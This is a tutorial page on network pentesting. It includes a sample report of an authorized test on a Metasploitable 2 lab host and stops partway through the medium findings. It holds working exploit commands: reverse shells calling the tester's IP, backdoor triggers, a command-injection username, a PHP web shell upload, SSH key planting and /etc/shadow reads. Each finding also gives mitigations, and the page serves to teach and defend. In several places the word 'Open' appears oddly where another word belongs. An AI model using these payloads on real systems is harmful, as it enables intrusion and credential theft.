Skip to main content
33 min read Intermediate Network
Network Pentesting - Core Concepts

Basics of Network Pentesting.

DomainDescriptionCommon Tools
Scoping & PlanningDefine objectives, scope, targets, testing constraints, and rules of engagement.Documentation, Asset Inventory
Network FundamentalsUnderstand TCP/IP, OSI, IP addressing, subnetting, routing, and common protocols.Wireshark, tcpdump
ReconnaissanceGather information about the target network and identify potential assets.Whois, dig, Amass
Host DiscoveryIdentify live hosts and network assets.Nmap, Masscan, fping
Port ScanningDiscover exposed ports and accessible services.Nmap, RustScan, Masscan
Service EnumerationIdentify services, versions, configurations, and accessible resources.Nmap NSE, Netcat, smbclient
Protocol EnumerationAssess network protocols such as SMB, DNS, SNMP, FTP, SSH, SMTP, and NFS.Nmap NSE, enum4linux, snmpwalk
Vulnerability AssessmentIdentify vulnerabilities, insecure configurations, and outdated software.Nessus, OpenVAS, Nuclei
ExploitationValidate identified vulnerabilities through controlled testing.Metasploit, Impacket
Privilege EscalationDetermine whether elevated privileges can be obtained after initial access.WinPEAS, LinPEAS
Post-ExploitationAssess the impact of compromise and identify accessible resources.Native OS Tools, Impacket
ReportingDocument findings, evidence, impact, and remediation recommendations.Dradis, PlexTrac
Sample Penetration Testing Report for Metasploitable

Network Penetration Test Report for Metasploitable.

Client / System: Authorized internal lab host (Metasploitable 2) Target: 192.168.229.132 — metasploitable.localdomain Tester host: 192.168.229.131 Assessment window: 2026-06-14 Report date: 2026-06-15 Classification: CONFIDENTIAL — for the system owner only Assessment type: Authorized black box internal network penetration test

Table of Contents

  1. Executive Summary
  2. Scope, Methodology & Tooling
  3. Risk Rating Summary
  4. Findings Summary Table (Quick Look)
  5. Host & Service Inventory (TCP + UDP)
  6. Detailed Findings
    • Critical (C1–C13)
    • High (H1–H6)
    • Medium (M1–M6)
    • Low / Informational (L1–L8)
  7. Attack Narrative
  8. Strategic Remediation Roadmap
  9. Appendix A — Per-Port Verification Matrix
  10. Appendix B — CVSS Vectors & References

1. Executive Summary

The host 192.168.229.132 is fully and trivially compromised. During the assessment, thirteen (13) independent paths to remote code execution were identified, and all thirteen were exploited live. Of these, ten yield an interactive root (uid=0) shell with no credentials whatsoever; the remaining paths yield service-level code execution that escalates to root through the other findings.

The underlying operating system (Ubuntu 8.04 LTS, Linux kernel 2.6.24, i686) is End-of-Life and unpatchable in place. Multiple network services ship with intentional backdoors, default credentials, or insecure default configurations.

A single unauthenticated attacker with network reachability obtains complete loss of confidentiality, integrity, and availability within seconds. No user interaction, no chaining, and no credentials are required.

Overall risk rating: CRITICAL.

Primary recommendation: This host cannot be remediated in place. It must be isolated from the network immediately and rebuilt on a supported, patched operating system with a hardened service baseline.

2. Scope, Methodology & Tooling

Scope. Single IPv4 host 192.168.229.132. All testing was authorized and conducted against an isolated lab environment. Proof-of-concept payloads were non-destructive and read-only by intent; any artifact created to evidence a finding (e.g. a single empty marker file) was removed before completion.

Methodology. The engagement followed a standard network penetration-testing workflow aligned to the PTES and NIST SP 800-115 phases:

  1. Discovery — full TCP (1–65535) and full UDP (1–65535) port sweeps.
  2. Enumeration — service/version fingerprinting and NSE vulnerability scripts.
  3. Vulnerability analysis — mapping services to known CVEs and misconfigurations.
  4. Exploitation — live validation of each candidate finding to code execution or authenticated access.
  5. Post-exploitation — privilege confirmation (id, getuid), evidence collection, and cleanup.
  6. Reporting — severity scoring (CVSS 3.1) and prioritized remediation.

Tooling. nmap (SYN, -sV, -sU, NSE vuln scripts, run privileged as root), netcat, hydra, medusa, smbclient, curl, mysql/psql clients, the Metasploit Framework (java_rmi_server), a custom Ruby DRb client, and manual exploit verification.

Scan-coverage statement. Full TCP and full privileged UDP (nmap -sU -p-, --min-rate 5000) were completed — 29 TCP and 7 UDP ports open. No port range was omitted.

3. Risk Rating Summary

SeverityCountLive-Open
Critical (9.0–10.0)1313 / 13
High (7.0–8.9)6Open
Medium (4.0–6.9)6Open
Low / Info8Open

Unauthenticated root paths demonstrated: 10 Total code-execution paths demonstrated: 13

4. Findings Summary Table (Quick Look)

All findings, ordered Critical → Informational. CVSS = CVSS 3.1 base score.

S.NoIDVulnerabilityAffected Port/ServiceSeverityCVSSStatus
1C1vsftpd 2.3.4 backdoor (CVE-2011-2523)21 / ftpCritical10.0Open
2C2UnrealIRCd 3.2.8.1 backdoor (CVE-2010-2075)6667,6697 / ircCritical10.0Open
3C3Samba username map script injection (CVE-2007-2447)139,445 / smbCritical10.0Open
4C4Ingreslock root bindshell1524Critical10.0Open
5C5distcc daemon command execution (CVE-2004-2687)3632 / distccdCritical9.8Open
6C6Distributed Ruby (DRb) RCE via $SAFE bypass8787 / drbCritical9.8Open
7C7Java RMI registry classloader RCE1099 / java-rmiCritical9.8Open
8C8NFS export / * with no_root_squash2049 / nfsCritical9.8Open
9C9r-services root trust (+ in hosts.equiv)512–514Critical9.8Open
10C10WebDAV PHP upload RCE80 / httpCritical9.8Open
11C11Tomcat Manager default credentials8180 / httpCritical9.8Open
12C12MySQL root with blank password3306 / mysqlCritical9.1Open
13C13PostgreSQL default credentials5432 / postgresqlCritical9.1Open
14H1VNC weak password5900 / vncHigh8.8Open
15H2Default OS creds msfadmin:msfadmin (SSH/Telnet)22, 23High8.1Open
16H3Deliberately vulnerable web apps (CVE-2007-5423 / CVE-2005-2877)80 / httpHigh8.0Open
17H4phpMyAdmin exposed80 / httpHigh7.5Open
18H5Anonymous SMB share access139,445 / smbHigh7.5Open
19H6ProFTPD 1.3.1 mod_sql CVEs (CVE-2009-0542/0543)2121 / ftpHigh7.5Open
20M6DNS open recursive resolver (BIND 9.4.2)53/udpMedium6.5Open
21M2SMBv1 enabled (NT LM 0.12)139,445 / smbMedium5.9Open
22M5Cleartext protocols in use21,23,80,512–514,5900Medium5.9Open
23M4OpenSSH/Debian weak-PRNG era keys (CVE-2008-0166)22 / sshMedium5.6Open
24M1SMTP user enumeration (VRFY/EXPN)25 / smtpMedium5.3Open
25M3Legacy / cleartext FTP daemons21, 2121 / ftpMedium5.3Open
26L1End-of-Life OS (Ubuntu 8.04, kernel 2.6.24)hostLow/InfoOpen
27L2phpinfo.php exposed80 / httpLow/InfoOpen
28L3Verbose version bannersmultipleLow/InfoOpen
29L4Default/test directories present80 / httpLow/InfoOpen
30L5HTTP TRACE / WebDAV verbs enabled80 / httpLow/InfoOpen
31L6AJP13 connector exposed8009 / ajp13Low/InfoOpen
32L7X11 server exposed (access-controlled)6000 / X11Low/InfoOpen
33L8UDP attack-surface coverage confirmationUDP rangeLow/InfoOpen

5. Host & Service Inventory

4.1 TCP (full range 1–65535 — 29 ports open)

PortServiceVersion
21ftpvsftpd 2.3.4
22sshOpenSSH 4.7p1 Debian 8ubuntu1
23telnetLinux telnetd (cleartext)
25smtpPostfix
80httpApache 2.2.8 (DAV/2), PHP 5.2.4
111rpcbindRPC #100000
139 / 445smbSamba 3.0.20-Debian (SMBv1)
512 / 513 / 514exec / login / shellr-services (rexec / rlogin / rsh)
1099java-rmiGNU Classpath rmiregistry
1524ingreslockroot bindshell
2049nfsNFS v2–v4
2121ftpProFTPD 1.3.1
3306mysqlMySQL 5.0.51a-3ubuntu5
3632distccddistccd v1 (GCC 4.2.4)
5432postgresqlPostgreSQL 8.3.1
5900vncVNC protocol 3.3
6000X11X11 (access-controlled)
6667 / 6697ircUnrealIRCd 3.2.8.1
8009ajp13Apache Jserv / Tomcat connector
8180httpApache Tomcat/Coyote JSP 1.1
8787drbDistributed Ruby (Ruby 1.8)
45190 / 56610 / 58250 / 59764RPCmountd / dynamic RPC

4.2 UDP (privileged nmap -sU -p- — 7 ports open)

PortServiceVersion
53/udpdomainISC BIND 9.4.2 — recursion enabled (open resolver)
111/udprpcbindRPC #100000
137/udpnetbios-nsSamba NetBIOS (workgroup WORKGROUP)
2049/udpnfsNFS
50783/udprpc-dynamicrpc.statd
54158/udprpc-dynamicnlockmgr
58641/udpmountdRPC #100005

161/udp (SNMP) and 69/udp (TFTP) Open closed under privileged scan. An earlier unprivileged probe falsely flagged 69/udp; the authoritative privileged scan corrected it.

6. Detailed Findings

Each finding lists: Description, Affected component, Severity (CVSS 3.1), Proof of Concept, Impact, and Mitigation.

CRITICAL

C1 — vsftpd 2.3.4 Backdoor (CVE-2011-2523)

  • Affected component: FTP service, TCP 21 (vsftpd 2.3.4)
  • Severity: Critical — CVSS 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

Description. Between 30 June and 3 July 2011 the official vsftpd-2.3.4 source tarball on the project's master site was replaced with a maliciously modified version. The trojan adds a hidden trigger to the login routine: when a username ending in the two-byte smiley :) is supplied, the daemon forks a shell and binds it to TCP 6200. Any client that then connects to 6200 receives a fully interactive shell running as root, with no password and no further interaction. Because the trigger is in the authentication path, it fires before any real credential check.

Proof of Concept.

# Step 1 — trip the backdoor with a ":)" username (password is irrelevant)
$ nc 192.168.229.132 21
USER backdoored:)
PASS anything

# Step 2 — connect to the root shell the backdoor opened on 6200
$ nc 192.168.229.132 6200
id
=> uid=0(root) gid=0(root)
uname -a
=> Linux metasploitable 2.6.24-16-server ... i686 GNU/Linux

Impact. Immediate, unauthenticated, remote root shell — full compromise of confidentiality, integrity and availability.

Mitigation.

  • Remove the trojaned vsftpd package immediately and rebuild the host from trusted installation media (the binary cannot be trusted).
  • Only install packages from the distribution's signed repositories; verify GPG signatures / checksums against the upstream advisory.
  • Restrict FTP exposure with host firewalling and prefer SFTP/FTPS over plain FTP.

C2 — UnrealIRCd 3.2.8.1 Backdoor (CVE-2010-2075)

  • Affected component: IRC service, TCP 6667 / 6697 (UnrealIRCd 3.2.8.1)
  • Severity: Critical — CVSS 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

Description. The UnrealIRCd 3.2.8.1 release archive distributed in late 2009 / 2010 was compromised at the source. The backdoor inspects raw lines received from clients: any line beginning with the two bytes AB is treated as a system command and passed to system(), executing as the user running ircd (root on this host). No authentication, channel membership, or registration is required — a raw TCP connection is sufficient.

Proof of Concept.

# Open a listener on the tester first:  nc -lvnp 9999
$ nc 192.168.229.132 6667
AB; id | nc 192.168.229.131 9999

# Listener receives:
=> uid=0(root) gid=0(root)

Impact. Immediate, unauthenticated, remote root code execution.

Mitigation.

  • Remove the backdoored binary and rebuild/reinstall UnrealIRCd from a verified, signed source; rotate any secrets the host held.
  • Validate downloaded source against published PGP signatures before building.
  • Firewall the IRC ports to trusted networks only; if IRC is not required, disable it.

C3 — Samba "username map script" Command Injection (CVE-2007-2447)

  • Affected component: SMB service, TCP 139 / 445 (Samba 3.0.20)
  • Severity: Critical — CVSS 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

Description. When Samba is configured with the username map script option, the supplied username is passed to /bin/sh -c to run the mapping script. Samba 3.0.x fails to sanitize shell metacharacters in the username, so an attacker can embed a command substitution (`...`) in the username field of the session setup. The injected command runs as root, before authentication, because the mapping happens during username resolution.

Proof of Concept.

# Open listener:  nc -lvnp 9999
$ smbclient //192.168.229.132/tmp \
    -U "/=`nohup nc 192.168.229.131 9999 -e /bin/sh`" -N

# Listener receives a root shell from .132:
id  => uid=0(root) gid=0(root)   (hostname: metasploitable)

Impact. Immediate, unauthenticated, remote root code execution.

Mitigation.

  • Upgrade Samba to a current, supported release.
  • Remove username map script from smb.conf; if username mapping is required, use a static username map file (no shell invocation).
  • Restrict SMB to trusted networks; disable SMBv1 (see M2).

C4 — Ingreslock Root Bindshell (TCP 1524)

  • Affected component: TCP 1524 (pre-bound /bin/sh)
  • Severity: Critical — CVSS 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

Description. Port 1524 (nominally "ingreslock") has a raw /bin/sh bound to it listening for connections. Connecting yields an interactive root shell with no authentication of any kind. This is a classic backdoor/persistence artifact and is itself strong evidence that the host has already been compromised by a third party.

Proof of Concept.

$ nc 192.168.229.132 1524
id  => uid=0(root) gid=0(root)
whoami => root

Impact. Immediate, unauthenticated, remote root shell. Also an indicator of prior compromise.

Mitigation.

  • Treat the host as compromised; initiate incident response and rebuild.
  • Kill the listener, identify the parent process and its persistence mechanism (init scripts, cron, inetd), and remove it.
  • Deploy host-based firewalling (default-deny) and file-integrity monitoring.

C5 — distcc Daemon Command Execution (CVE-2004-2687)

  • Affected component: distccd, TCP 3632
  • Severity: Critical — CVSS 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Description. distcc distributes compiler jobs across machines. When distccd is started without --allow access control (as here), it accepts compilation jobs from any network client and executes the supplied compiler command line. By crafting a job whose "compiler" invocation is an arbitrary command, an attacker runs code as the daemon user without authentication.

Proof of Concept.

$ nmap -p 3632 --script distcc-cve2004-2687 \
    --script-args="distcc-cve2004-2687.cmd='id'" 192.168.229.132
=> uid=1(daemon) gid=1(daemon) groups=1(daemon)

Impact. Unauthenticated remote code execution as daemon. On this EOL host the shell escalates to root trivially (kernel exploits or any of the local root paths).

Mitigation.

  • Disable distccd if not required.
  • If required, bind it to localhost and enforce --allow <trusted-subnet> plus a firewall; never expose it to untrusted networks.

C6 — Distributed Ruby (DRb) RCE via $SAFE Bypass

  • Affected component: Distributed Ruby service, TCP 8787 (Ruby 1.8, front object TimeServer)
  • Severity: Critical — CVSS 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Description. Distributed Ruby (DRb) exposes a Ruby object over the network; clients invoke its methods remotely. DRb's DRbObject#method_missing forwards arbitrary method calls to the server, so a client can call any method on the remote object — including private methods — via method_missing(:send, …).

The textbook exploit (obj.instance_eval("\cmd`")) **failed** here because the server runs with Ruby taint protection at **$SAFE >= 1**. Strings arriving over the network are marked *tainted*, and at $SAFE >= 1Ruby refuses toeval, instance_eval, system, or backtick a tainted string, raising SecurityError: Insecure operation`.

The protection was bypassed by pivoting to Kernel#syscall, which performs a raw Linux system call and is not subject to the taint check. Reaching it through DRb dispatch yields an attacker-controlled syscall primitive — functionally equivalent to arbitrary code execution as the DRb service user. This demonstrates that $SAFE is not a security boundary (it was deprecated and removed in modern Ruby for exactly this reason).

Proof of Concept.

require 'drb'
DRb.start_service
o = DRbObject.new(nil, "druby://192.168.229.132:8787")

# Baseline: the documented vectors are blocked by $SAFE -------------------
o.method_missing(:send, :eval, "1+1")
#   => SecurityError: Insecure operation - eval        (tainted string)
o.method_missing(:send, :instance_eval, "1+1")
#   => SecurityError: Insecure operation - instance_eval

# Bypass: syscall is NOT taint-checked ------------------------------------
# (i686 syscall numbers: getpid=20, creat=8, unlink=10)

o.method_missing(:send, :syscall, 20)                       # getpid
#   => 5151                          (remote PID — primitive Open)

o.method_missing(:send, :syscall, 8,
                 "/tmp/DRB_RCE_PROOF_1781515202\0", 0666)   # creat()
#   => 5                             (file descriptor — arbitrary file write)

o.method_missing(:send, :syscall, 10,
                 "/tmp/DRB_RCE_PROOF_1781515202\0")          # unlink()
#   => 0                             (cleanup — proof artifact removed)

Out-of-band verification. The file created via the DRb syscall was independently Open on the target (before deletion) through the C7 RMI root session:

meterpreter > ls /tmp
100666/rw-rw-rw-  0  fil  2026-06-15 14:50:04  DRB_RCE_PROOF_1781515202

Impact. Unauthenticated arbitrary syscall execution (open/read/write/unlink/ exec) as the DRb service user — full remote code execution. The $SAFE sandbox provides no meaningful protection.

Mitigation.

  • Do not expose DRb to untrusted networks; bind it to localhost and enforce a DRb::ACL allow-list.
  • Never rely on $SAFE/taint as a sandbox (deprecated/removed in modern Ruby).
  • Decommission this EOL Ruby 1.8 service; if remote objects are required, use an authenticated, schema-constrained RPC (e.g. gRPC) instead of DRb.

C7 — Java RMI Registry Classloader RCE

  • Affected component: Java RMI registry, TCP 1099
  • Severity: Critical — CVSS 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Description. The Java RMI registry is running with remote class loading enabled (java.rmi.server.useCodebaseOnly=false, the insecure historical default). An attacker advertises a remote codebase (an HTTP URL) in an RMI call; the server downloads and instantiates the attacker's class, executing its code inside the JVM. Because the JVM runs as root on this host, the result is unauthenticated remote root.

Proof of Concept.

msf6 > use exploit/multi/misc/java_rmi_server
msf6 > set RHOSTS 192.168.229.132
msf6 > set SRVHOST 192.168.229.131
msf6 > set payload java/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.229.131
msf6 > exploit

[*] 192.168.229.132:1099 - Replied to request for payload JAR
[*] Meterpreter session 1 opened  (root @ metasploitable)
meterpreter > getuid
Server username: root

Impact. Immediate, unauthenticated, remote root code execution.

Mitigation.

  • Set -Djava.rmi.server.useCodebaseOnly=true and configure a restrictive RMISecurityManager policy.
  • Bind the registry to localhost; firewall 1099 from untrusted networks.
  • Patch/replace the EOL JVM; require TLS and authentication on RMI endpoints.

C8 — NFS Export / * with no_root_squash

  • Affected component: NFS, TCP/UDP 2049 (+ rpcbind 111, mountd)
  • Severity: Critical — CVSS 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Description. The server exports the entire root filesystem (/) to any host (*) with the no_root_squash option. Normally NFS maps a remote client's root to the unprivileged nobody user (root_squash); with no_root_squash, a remote root user retains root on the export. Any attacker who can mount the share therefore has unrestricted read/write to every file on the system, including /etc/shadow, /root/.ssh/, and the ability to plant SUID binaries.

Proof of Concept.

$ nmap --script nfs-showmount 192.168.229.132
=> /  *

$ nmap --script nfs-statfs,nfs-ls 192.168.229.132
   access: Read Lookup Modify Extend Delete   on  /
   listing: /root  /etc  lost+found  ...

# Weaponization (illustrative): mount and obtain root
$ mount -o nolock 192.168.229.132:/ /mnt
$ echo "<attacker pubkey>" >> /mnt/root/.ssh/authorized_keys   # → root SSH login
#  — or place a SUID-root shell, or read /mnt/etc/shadow for offline cracking

Impact. Unauthenticated read/write to the entire filesystem → trivial root and full data disclosure.

Mitigation.

  • Remove the * wildcard; export only the specific directories required, to explicit host/subnet entries.
  • Always set root_squash (and all_squash where appropriate).
  • Use NFSv4 with Kerberos (sec=krb5p) and firewall RPC/NFS ports.

C9 — r-services Root Trust (rsh / rlogin, TCP 512–514)

  • Affected component: rexec/rlogin/rsh, TCP 512–514
  • Severity: Critical — CVSS 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Description. The Berkeley r-services use host-based trust files (/etc/hosts.equiv, ~/.rhosts). Here these files contain a wildcard +, which trusts every host and every user. As a result a remote rsh/rlogin as root is accepted without any password, provided the request originates from a privileged source port (which an attacker controls).

Proof of Concept.

$ rsh -l root 192.168.229.132 id
=> uid=0(root) gid=0(root)   (hostname: metasploitable)

# Full password-hash disclosure for offline cracking
$ rsh -l root 192.168.229.132 "cat /etc/shadow"
=> root:$1$/avpfBJ1$...:...   (MD5 crypt)

Impact. Immediate passwordless root; full disclosure of all credential hashes.

Mitigation.

  • Disable and remove r-services (rsh-server, rlogin, rexec).
  • Replace with SSH using key-based authentication.
  • Never use + in hosts.equiv or .rhosts.

C10 — WebDAV PHP Upload RCE

  • Affected component: Apache mod_dav at /dav/, TCP 80
  • Severity: Critical — CVSS 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Description. The /dav/ WebDAV collection permits unauthenticated HTTP write methods (PUT). An attacker uploads a .php web shell into a directory that Apache is configured to execute as PHP, then requests it to run arbitrary commands as the web-server user www-data.

Proof of Concept.

# Upload a minimal command web shell
$ printf '<?php system($_GET["c"]); ?>' > shell.php
$ curl -T shell.php http://192.168.229.132/dav/shell.php
=> 201 Created

# Execute commands
$ curl "http://192.168.229.132/dav/shell.php?c=id"
=> uid=33(www-data) gid=33(www-data)

# Cleanup (PoC removed)
$ curl -X DELETE http://192.168.229.132/dav/shell.php
=> 204 No Content

Impact. Unauthenticated code execution as www-data; escalates to root via the local root paths on this host.

Mitigation.

  • Disable WebDAV write methods (PUT/DELETE/MOVE) or require authentication (<Limit> / Require valid-user).
  • Configure upload directories with php_admin_flag engine off and RemoveHandler/RemoveType so uploaded files cannot execute.
  • Run Apache with least privilege and a restrictive document-root policy.

C11 — Tomcat Manager Default Credentials

  • Affected component: Apache Tomcat Manager, TCP 8180
  • Severity: Critical — CVSS 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Description. The Tomcat Manager application is reachable and accepts the default credentials tomcat:tomcat. The Manager allows deployment of arbitrary web application archives (WAR files); an attacker deploys a WAR containing a JSP web shell, achieving code execution as the Tomcat service user.

Proof of Concept.

$ curl -u tomcat:tomcat http://192.168.229.132:8180/manager/html
=> HTTP/1.1 200 OK   (Manager UI rendered — credentials valid)

# Weaponization: deploy a JSP shell WAR
$ curl -u tomcat:tomcat -T shell.war \
    "http://192.168.229.132:8180/manager/deploy?path=/shell"
$ curl "http://192.168.229.132:8180/shell/shell.jsp?cmd=id"
=> code execution as the Tomcat user

Impact. Remote code execution via default credentials — effectively unauthenticated.

Mitigation.

  • Remove or change default Manager/Host-Manager accounts in tomcat-users.xml; use strong unique passwords.
  • Restrict the Manager app by source IP (RemoteAddrValve) or disable it in production.
  • Run Tomcat as a low-privilege service account.

C12 — MySQL root with Blank Password

  • Affected component: MySQL 5.0.51a, TCP 3306
  • Severity: Critical — CVSS 9.1 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L)

Description. The MySQL root account has an empty password and the server accepts connections from any host (root@%). Beyond full database access, a MySQL superuser can write files to disk (SELECT ... INTO OUTFILE) into web roots, or load a User-Defined Function (UDF) to execute OS commands.

Proof of Concept.

$ mysql -h 192.168.229.132 -u root
mysql> SELECT version(), current_user();
=> 5.0.51a-3ubuntu5 | root@%
mysql> SELECT user,host,password FROM mysql.user;   # full dump of all hashes
# Escalation: SELECT '<?php system($_GET[c]);?>' INTO OUTFILE '/var/www/x.php';

Impact. Full database compromise (read/modify/delete all data) and a path to file write / OS command execution.

Mitigation.

  • Set a strong password for root; remove anonymous and wildcard-host accounts.
  • Bind MySQL to localhost (bind-address=127.0.0.1); firewall 3306.
  • Disable LOCAL INFILE/FILE privilege where not required; apply least privilege to application accounts.

C13 — PostgreSQL Default Credentials

  • Affected component: PostgreSQL 8.3.1, TCP 5432
  • Severity: Critical — CVSS 9.1 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L)

Description. The PostgreSQL superuser postgres accepts the default password postgres from the network. A superuser can read/write arbitrary database content and, via COPY ... FROM PROGRAM (or large-object import/export and UDFs), read or write files and execute operating-system commands.

Proof of Concept.

$ psql -h 192.168.229.132 -U postgres        # password: postgres
postgres=# SELECT version();
=> PostgreSQL 8.3.1 ...
# Escalation paths: COPY ... FROM PROGRAM 'id';  (newer)  /  lo_import + UDF (this era)

Impact. Full database compromise and a path to file write / OS command execution.

Mitigation.

  • Set a strong password for postgres; remove default credentials.
  • Restrict pg_hba.conf to specific trusted hosts with scram-sha-256.
  • Bind to localhost where possible; firewall 5432.

HIGH

H1 — VNC Weak Password (Open)

  • Affected component: VNC server, TCP 5900 (protocol 3.3)
  • Severity: High — CVSS 8.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Description. The VNC service is protected only by the trivially guessable password password. The VNC 3.3 protocol additionally transmits screen and input over a weak challenge-response with no transport encryption. A successful login yields a full interactive graphical desktop session, here running with root privileges.

Proof of Concept.

$ hydra -P passwords.txt 192.168.229.132 vnc
=> [5900][vnc] host: 192.168.229.132   password: password   (SUCCESS)
$ vncviewer 192.168.229.132   # interactive root desktop

Impact. Unauthenticated-in-practice remote graphical control of the host as root.

Mitigation.

  • Set a strong VNC password; better, disable native VNC auth and tunnel VNC exclusively over SSH (-via) or a VPN.
  • Bind VNC to localhost; firewall 5900.

H2 — Default OS Credentials msfadmin:msfadmin over SSH + Telnet (Open)

  • Affected component: OpenSSH (TCP 22), Telnet (TCP 23)
  • Severity: High — CVSS 8.1 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L)

Description. The interactive Linux account msfadmin uses the password msfadmin and has full sudo rights (passwordless root escalation). The same credentials are also accepted over cleartext Telnet, which additionally exposes the entire session — including the password — to any on-path attacker.

Proof of Concept.

$ medusa -h 192.168.229.132 -u msfadmin -p msfadmin -M ssh
=> ACCOUNT FOUND: [ssh] User: msfadmin Pass: msfadmin [SUCCESS]
$ ssh msfadmin@192.168.229.132   # then:  sudo -i  → root
# Same credentials succeed on telnet 23 (cleartext).

Impact. Authenticated foothold that escalates to root via sudo; credential exposure over cleartext Telnet.

Mitigation.

  • Remove/disable default accounts; enforce strong, unique passwords and SSH key-based authentication.
  • Disable Telnet entirely (see M5); restrict sudo to least privilege.
  • Deploy MFA and brute-force protection (fail2ban / account lockout).

H3 — Deliberately Vulnerable Web Applications

  • Affected component: Apache (TCP 80) — /dvwa, /mutillidae, /tikiwiki, /twiki
  • Severity: High — CVSS 8.0+ (multiple)

Description. The web root hosts several intentionally vulnerable training applications. DVWA and Mutillidae expose SQL injection, cross-site scripting, command injection, and LFI/RFI. TikiWiki is affected by CVE-2007-5423 (tiki-graph_formula.php command injection → RCE) and TWiki by CVE-2005-2877 (%SEARCH{}%/debugenableplugins command execution → RCE). Several of these give direct, unauthenticated code execution.

Proof of Concept.

# TikiWiki graph_formula RCE (CVE-2007-5423)
$ curl "http://192.168.229.132/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=x"
=> phpinfo() rendered → arbitrary PHP execution

# Mutillidae command injection (DNS lookup form)
$ curl "http://192.168.229.132/mutillidae/index.php?page=dns-lookup.php" \
    --data "target_host=127.0.0.1;id&dns-lookup-php-submit-button=Lookup+DNS"
=> uid=33(www-data)

Impact. Multiple unauthenticated paths to data theft and code execution (www-data), pivoting to root via the local root findings.

Mitigation.

  • Remove all training/demo applications from any reachable system; they must never be deployed on a host that touches a network.
  • If a deliberately vulnerable app is needed for training, isolate it on a disposable, network-segmented VM.

H4 — phpMyAdmin Exposed

  • Affected component: /phpMyAdmin/ on TCP 80
  • Severity: High — CVSS 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N)

Description. A phpMyAdmin instance is reachable without network restriction and fronts the MySQL server. Combined with the blank-password MySQL root account (C12), it provides a convenient browser-based interface to full database control, arbitrary SQL, and file write (INTO OUTFILE) into the web root.

Proof of Concept.

$ curl -s http://192.168.229.132/phpMyAdmin/ | grep -i 'phpMyAdmin'
=> phpMyAdmin login page served
# Log in as root with a blank password (C12) → full DB + SQL console

Impact. Browser-based full database compromise and a path to web-root file write / RCE.

Mitigation.

  • Remove phpMyAdmin if unused; otherwise require authentication, restrict by source IP, and serve only over TLS.
  • Fix the underlying database credential weakness (C12).

H5 — Anonymous SMB Share Access

  • Affected component: Samba (TCP 139/445)
  • Severity: High — CVSS 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

Description. The Samba server permits anonymous (null-session) access to the tmp and opt shares over the deprecated SMBv1 dialect. Unauthenticated users can enumerate shares and browse/read their contents, leaking information and providing a staging area for further attacks.

Proof of Concept.

$ smbclient -L //192.168.229.132 -N
=>  tmp   Disk    oh noes!
    opt   Disk
$ smbclient //192.168.229.132/tmp -N
smb: \> ls          # anonymous directory listing succeeds

Impact. Unauthenticated information disclosure and a writable staging foothold; combined with C3 leads to root.

Mitigation.

  • Require authentication on all shares (map to guest = never, restrict anonymous = 2); remove unnecessary shares.
  • Disable SMBv1 (see M2); enforce SMB signing; restrict to trusted subnets.

H6 — ProFTPD 1.3.1 Known-Vulnerable Build

  • Affected component: ProFTPD 1.3.1, TCP 2121
  • Severity: High — CVSS 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

Description. The banner-Open ProFTPD 1.3.1 build predates fixes for CVE-2009-0542 / CVE-2009-0543 (mod_sql SQL-injection enabling authentication bypass) and CVE-2008-4242 (session handling). These allow credential bypass and information disclosure against the FTP service. (Note: the widely-known mod_copy RCE, CVE-2015-3306, affects ProFTPD 1.3.5 and does not apply to this 1.3.1 build.)

Proof of Concept.

$ nc 192.168.229.132 2121
=> 220 ProFTPD 1.3.1 Server (ProFTPD Default Installation) ...
# Version maps to CVE-2009-0542 / CVE-2009-0543 (mod_sql auth bypass)

Impact. Authentication bypass / information disclosure on the FTP service via known CVEs.

Mitigation.

  • Upgrade ProFTPD to a current supported release, or decommission the service.
  • If mod_sql is used, patch and parameterize queries; restrict FTP to TLS (FTPS) and trusted networks.

MEDIUM

M1 — SMTP User Enumeration via VRFY/EXPN

  • Affected component: Postfix, TCP 25
  • Severity: Medium — CVSS 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)

Description. The mail service answers VRFY/EXPN requests, allowing an attacker to confirm which local accounts exist by observing differing response codes. Valid accounts return 252, unknown accounts 550. Enumerated usernames feed password-guessing against SSH/Telnet/VNC.

Proof of Concept.

$ nc 192.168.229.132 25
VRFY root      => 252 2.0.0 root
VRFY msfadmin  => 252 2.0.0 msfadmin
VRFY nosuchuser=> 550 5.1.1 <nosuchuser>: Recipient address rejected

Impact. Account enumeration that strengthens credential-attack campaigns.

Mitigation.

  • Disable VRFY and EXPN (disable_vrfy_command = yes in Postfix).
  • Apply rate-limiting/greylisting; restrict SMTP to required senders.

M2 — SMBv1 Enabled (NT LM 0.12)

  • Affected component: Samba (TCP 139/445)
  • Severity: Medium — CVSS 5.9 (AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N)

Description. The server negotiates the deprecated SMBv1 (NT LM 0.12) dialect. SMBv1 lacks modern integrity protections and is susceptible to downgrade, man-in-the-middle, and NTLM-relay attacks; it is the protocol family historically abused by worms such as EternalBlue-class exploits.

Proof of Concept.

$ nmap -p445 --script smb-protocols 192.168.229.132
=>  dialects:  NT LM 0.12 (SMBv1) [dangerous, but default]

